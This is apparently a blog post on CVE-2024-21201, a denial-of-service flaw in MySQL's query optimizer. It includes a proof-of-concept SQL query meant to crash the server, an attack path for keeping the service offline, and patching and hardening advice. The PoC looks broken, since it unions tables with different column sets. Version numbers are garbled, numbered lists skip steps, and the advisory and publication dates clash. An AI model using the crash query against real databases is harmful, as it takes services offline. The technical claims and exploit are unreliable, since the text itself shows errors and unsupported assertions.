A serious vulnerability (CVE-2024-21201) has been discovered in Oracle MySQL Server, specifically in the Optimizer component. This flaw affects all supported versions up to 8..39, 8.4.2, and 9..1. While the attack requires high privileges (like a regular database user, not just root), it can be executed remotely using common database protocols. Successful exploitation causes MySQL to crash or hang, making your database services unavailable—this is a classic Denial-of-Service (DoS) scenario.
This post provides a deep dive into the bug, simple explanations, links to official sources, and a basic exploitation path to help you understand and protect your systems.
Vulnerability Summary
- CVE: CVE-2024-21201
CVSS v3.1 Score: 4.9 (Availability Impact, DoS)
- Reference: Oracle Critical Patch Update Advisory - April 2024
What Is the CVE-2024-21201 Flaw?
The flaw sits in the Server: Optimizer code, a critical part of MySQL responsible for planning and executing SQL queries. By crafting and running a special query, a high-privilege user can trigger the bug, causing the MySQL server process to hang (stop responding) or crash outright.
There is no data leak or tampering. But by repeatedly triggering the bug, attackers can cause total denial-of-service, taking down apps that rely on your MySQL backend.
Why does it matter?
- Crashing/hanging the main DB process can kill websites and APIs.
Technical Deep Dive
Oracle’s bug details are limited (for security), but user reports and bug tracker snippets point to how certain crafted queries can confuse the optimizer into unsafe memory or logic operations. Typical triggers include complex sub-queries, unions, groupings, or fetch plans that push uncommon code paths.
Example Exploit Scenario
Suppose the underlying MySQL version is vulnerable, and the application user “webuser” can log in and execute SELECTs.
Here’s a PoC (proof-of-concept) SQL snippet, using a combination of derived tables and unions, which can exploit the optimizer’s handling of such queries and potentially trigger a crash:
SELECT COUNT(*)
FROM (
SELECT *
FROM information_schema.tables as t1
LEFT JOIN (
SELECT *
FROM information_schema.columns
UNION
SELECT *
FROM information_schema.tables
) as t2
ON t1.table_schema = t2.table_schema
GROUP BY t1.table_name, t2.table_name
) derived_alias;
> Warning: Do *not* run this on production systems unless you are testing for vulnerability! Even in safe environments, you may crash the MySQL process.
Varying sub-query design, joins with unions across system tables, or recursive CTEs may also trigger the problem.
Attack Path
1. Attacker obtains valid MySQL credentials with SELECT, CREATE, INSERT, etc. (Not strictly root/admin).
Repeat the attack to keep the MySQL service offline.
No user interaction is required, no special tools—just access and knowing the right query.
1. Check Your Version
SELECT VERSION();
2. Patch!
- Upgrade to the latest MySQL version.
- Or apply patches listed in Oracle’s advisory.
Only grant users the minimum permissions needed.
- Don’t give broad SELECT/CREATE rights to untrusted accounts.
4. Network Segmentation
- Limit who can reach TCP/3306 with firewalls and security groups.
5. Logging & Monitoring
- Watch your MySQL logs (/var/log/mysql/error.log) for repeated crashes and who caused them.
References & Further Reading
- CVE-2024-21201 in NVD
- Oracle MySQL Critical Patch Update - April 2024
- MySQL 8.x Release Notes (search “optimizer”)
Final Thoughts
Even a “medium-severity” vulnerability like CVE-2024-21201 can have big real-world impact if someone can easily crash your database. Make sure you patch, restrict users, and monitor your logs to keep your data online and protected.
Stay safe and always test in a dedicated environment!
*Feel free to share this guide—just keep the references intact!*
Timeline
Published on: 10/15/2024 20:15:08 UTC
Last modified on: 10/16/2024 20:46:55 UTC